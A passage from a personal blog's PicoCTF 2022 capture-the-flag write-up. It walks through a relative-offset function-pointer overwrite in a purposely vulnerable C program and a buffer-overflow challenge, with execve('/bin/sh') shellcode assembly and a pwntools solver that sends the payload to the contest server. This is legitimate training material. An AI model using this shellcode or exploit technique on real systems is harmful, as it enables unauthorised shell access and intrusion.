class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> score <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span><span class=\"token class-name\">size_t</span> i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> len<span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span>\n  <span class=\"token punctuation\">{</span>\n    score <span class=\"token operator\">+=</span> story<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n\n  <span class=\"token keyword\">return</span> score<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">easy_checker</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>story<span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> len<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">calculate_story_score</span><span class=\"token punctuation\">(</span>story<span class=\"token punctuation\">,</span> len<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1337</span><span class=\"token punctuation\">)</span>\n  <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">char</span> 
buf<span class=\"token punctuation\">[</span>FLAGSIZE<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token number\">0</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n    FILE <span class=\"token operator\">*</span>f <span class=\"token operator\">=</span> <span class=\"token function\">fopen</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"flag.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"r\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>f <span class=\"token operator\">==</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">{</span>\n      <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%s %s\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Please create 'flag.txt' in this directory with your\"</span><span class=\"token punctuation\">,</span>\n                      <span class=\"token string\">\"own debugging flag.\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n      <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span> FLAGSIZE<span class=\"token punctuation\">,</span> f<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span> <span class=\"token 
comment\">// size bound read</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"You're 1337. Here's the flag.\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%s\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">else</span>\n  <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"You've failed this class.\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">hard_checker</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>story<span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> len<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">calculate_story_score</span><span class=\"token punctuation\">(</span>story<span class=\"token punctuation\">,</span> len<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">13371337</span><span class=\"token punctuation\">)</span>\n  <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span>FLAGSIZE<span class=\"token 
punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token number\">0</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n    FILE <span class=\"token operator\">*</span>f <span class=\"token operator\">=</span> <span class=\"token function\">fopen</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"flag.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"r\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>f <span class=\"token operator\">==</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">{</span>\n      <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%s %s\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Please create 'flag.txt' in this directory with your\"</span><span class=\"token punctuation\">,</span>\n                      <span class=\"token string\">\"own debugging flag.\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n      <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span> FLAGSIZE<span class=\"token punctuation\">,</span> f<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span> <span class=\"token comment\">// size bound read</span>\n    <span class=\"token 
function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"You're 13371337. Here's the flag.\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%s\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">else</span>\n  <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"You've failed this class.\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">*</span>check<span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=</span> hard_checker<span class=\"token punctuation\">;</span>\n<span class=\"token keyword\">int</span> fun<span class=\"token punctuation\">[</span><span class=\"token number\">10</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token number\">0</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">vuln</span><span class=\"token punctuation\">(</span><span 
class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> story<span class=\"token punctuation\">[</span><span class=\"token number\">128</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">int</span> num1<span class=\"token punctuation\">,</span> num2<span class=\"token punctuation\">;</span>\n\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Tell me a story and then I'll tell you if you're a 1337 >> \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%127s\"</span><span class=\"token punctuation\">,</span> story<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"On a totally unrelated note, give me two numbers. 
Keep the first one less than 10.\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%d %d\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>num1<span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>num2<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>num1 <span class=\"token operator\">&lt;</span> <span class=\"token number\">10</span><span class=\"token punctuation\">)</span>\n  <span class=\"token punctuation\">{</span>\n    fun<span class=\"token punctuation\">[</span>num1<span class=\"token punctuation\">]</span> <span class=\"token operator\">+=</span> num2<span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n\n  <span class=\"token function\">check</span><span class=\"token punctuation\">(</span>story<span class=\"token punctuation\">,</span> <span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span>story<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n \n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> argc<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token operator\">*</span>argv<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span 
class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Set the gid to the effective gid</span>\n  <span class=\"token comment\">// this prevents /bin/sh from dropping the privileges</span>\n  <span class=\"token class-name\">gid_t</span> gid <span class=\"token operator\">=</span> <span class=\"token function\">getegid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setresgid</span><span class=\"token punctuation\">(</span>gid<span class=\"token punctuation\">,</span> gid<span class=\"token punctuation\">,</span> gid<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">vuln</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>When you run it normally, <code class=\"language-text\">vuln</code> calls the function <code class=\"language-text\">check</code>.</p>\n<p>As shown by <code class=\"language-text\">void (*check)(char*, size_t) = hard_checker;</code>, this <code class=\"language-text\">check</code> variable stores a pointer to the <code class=\"language-text\">hard_checker</code> function.</p>\n<p>At a high level, the route to the flag was to rewrite this function address to the address of <code class=\"language-text\">easy_checker</code>, then find an input that satisfies <code class=\"language-text\">calculate_story_score(story, len) == 
1337</code>.</p>\n<p>Here, instead of overwriting the function address directly, I abused the following code to perform a relative address overwrite.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>num1 <span class=\"token operator\">&lt;</span> <span class=\"token number\">10</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n    fun<span class=\"token punctuation\">[</span>num1<span class=\"token punctuation\">]</span> <span class=\"token operator\">+=</span> num2<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Specifically, by making the second input <code class=\"language-text\">-16 -314</code>, you can subtract <code class=\"language-text\">314</code> from the value at the address located 16 bytes before the start of the <code class=\"language-text\">fun</code> array.</p>\n<p>As a result, the value of <code class=\"language-text\">check</code>, which originally stored the address of the <code class=\"language-text\">hard_checker</code> function, is overwritten with <code class=\"language-text\">hard_checker</code>’s address minus 314, causing it to point to the address of <code class=\"language-text\">easy_checker</code>.</p>\n<p>Then I searched for an input of at most 127 characters whose calculation result below becomes 1337. 
The first input turned out to be <code class=\"language-text\">aaaaaaaaaaaaaL</code>, which let me get the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">int</span> <span class=\"token function\">calculate_story_score</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>story<span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> len<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> score <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span><span class=\"token class-name\">size_t</span> i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> len<span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span>\n  <span class=\"token punctuation\">{</span>\n    score <span class=\"token operator\">+=</span> story<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n\n  <span class=\"token keyword\">return</span> score<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<h3 id=\"ropfupwn\" style=\"position:relative;\"><a href=\"#ropfupwn\" aria-label=\"ropfupwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 
3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>ropfu(Pwn)</h3>\n<blockquote>\n<h4 id=\"description-4\" style=\"position:relative;\"><a href=\"#description-4\" aria-label=\"description 4 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Description</h4>\n<p>What’s ROP?</p>\n</blockquote>\n<p>It was an introductory ROP problem.</p>\n<p>For starters, running <code class=\"language-text\">objdump</code> shows that the stack region has execute permission.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ objdump -x vuln\nvuln:     <span class=\"token function\">file</span> <span class=\"token function\">format</span> elf32-i386\nvuln\narchitecture: i386, flags 0x00000112:\nEXEC_P, HAS_SYMS, D_PAGED\nstart address 0x08049c20\n\nProgram Header:\n    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align <span class=\"token number\">2</span>**12\n         filesz 0x000001e8 memsz 0x000001e8 flags r--\n    LOAD off    0x00001000 vaddr 0x08049000 paddr 0x08049000 align <span class=\"token number\">2</span>**12\n         filesz 0x0006a960 memsz 0x0006a960 flags r-x\n    LOAD off    0x0006c000 vaddr 0x080b4000 paddr 0x080b4000 align <span class=\"token number\">2</span>**12\n         
filesz 0x0002e42d memsz 0x0002e42d flags r--\n    LOAD off    0x0009a6a0 vaddr 0x080e36a0 paddr 0x080e36a0 align <span class=\"token number\">2</span>**12\n         filesz 0x00002c18 memsz 0x00003950 flags rw-\n    NOTE off    0x00000134 vaddr 0x08048134 paddr 0x08048134 align <span class=\"token number\">2</span>**2\n         filesz 0x00000044 memsz 0x00000044 flags r--\n     TLS off    0x0009a6a0 vaddr 0x080e36a0 paddr 0x080e36a0 align <span class=\"token number\">2</span>**2\n         filesz 0x00000010 memsz 0x00000030 flags r--\n   STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align <span class=\"token number\">2</span>**4\n         filesz 0x00000000 memsz 0x00000000 flags rwx\n   RELRO off    0x0009a6a0 vaddr 0x080e36a0 paddr 0x080e36a0 align <span class=\"token number\">2</span>**0\n         filesz 0x00001960 memsz 0x00001960 flags r--</code></pre></div>\n<p>The stack region that could be overwritten via the buffer overflow was 28 bytes, so I wrote shellcode that would spawn a shell within that space.</p>\n<p>The shellcode could be written in the following assembly.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token punctuation\">;</span> binsh2<span class=\"token punctuation\">.</span>s\nBITS <span class=\"token number\">32</span>\nglobal _start\n \n_start<span class=\"token operator\">:</span>\n    mov eax<span class=\"token punctuation\">,</span> <span class=\"token number\">11</span>\n    jmp buf\nsetebx<span class=\"token operator\">:</span>\n    pop ebx\n    xor ecx<span class=\"token punctuation\">,</span> ecx\n    xor edx<span class=\"token punctuation\">,</span> edx\n    <span class=\"token keyword\">int</span> <span class=\"token number\">0x80</span>\nbuf<span class=\"token operator\">:</span>\n    call setebx\n    db <span class=\"token char\">'/bin/sh'</span><span class=\"token punctuation\">,</span> <span class=\"token 
number\">0</span></code></pre></div>\n<p>This calls <code class=\"language-text\">execve</code> on x86.</p>\n<p>See the following for more details.</p>\n<p>Reference: <a href=\"https://inaz2.hatenablog.com/entry/2014/03/13/013056\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Writing shellcode for Linux x86 - Momoiro Technology</a></p>\n<p>Reference: <a href=\"https://book.mynavi.jp/manatee/detail/id=64562\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">What Is Shellcode? | Tech Book Zone Manatee</a></p>\n<p>After embedding this shellcode on the stack, I thought it would be enough to place a <code class=\"language-text\">ret rsp</code> gadget in the return address, but I could not find such a gadget.</p>\n<p>So instead, I searched for a <code class=\"language-text\">jmp eax</code> gadget and used that address, which let me get the flag.</p>\n<p>The final solver is below.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n<span class=\"token keyword\">import</span> binascii\n<span class=\"token keyword\">import</span> time\n\nelf <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span><span class=\"token string\">\"./vuln\"</span><span class=\"token punctuation\">)</span>\ncontext<span class=\"token punctuation\">.</span>binary <span class=\"token operator\">=</span> elf\n\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"shellcode\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    payload <span class=\"token operator\">=</span> f<span 
class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\"\\x90\"</span><span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token number\">28</span><span class=\"token operator\">-</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\nret <span class=\"token operator\">=</span> p32<span class=\"token punctuation\">(</span><span class=\"token number\">0x0805334b</span><span class=\"token punctuation\">)</span> <span class=\"token comment\"># jmp eax</span>\npayload <span class=\"token operator\">+=</span> ret\n\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"shellcode\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Local</span>\np <span class=\"token operator\">=</span> process<span class=\"token punctuation\">(</span><span class=\"token string\">\"./vuln\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Remote</span>\np <span class=\"token operator\">=</span> remote<span class=\"token 
punctuation\">(</span><span class=\"token string\">\"saturn.picoctf.net\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">59222</span><span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> p<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>That was a rough writeup.</p>\n<p>I could not clear all of the Pwn challenges, so I need more practice.</p>","fields":{"slug":"/ctf-picoctf-2022-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2022-03-30","description":"","tags":["Rev (en)","Pwn (en)","Forensic (en)","English"],"title":"PicoCTF 2022 Writeup","socialImage":{"publicURL":"/static/43b63a7448b0fa40e9aeb9f982151bfd/ctf-picoctf-2022.png"}}}},"pageContext":{"slug":"/ctf-picoctf-2022-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}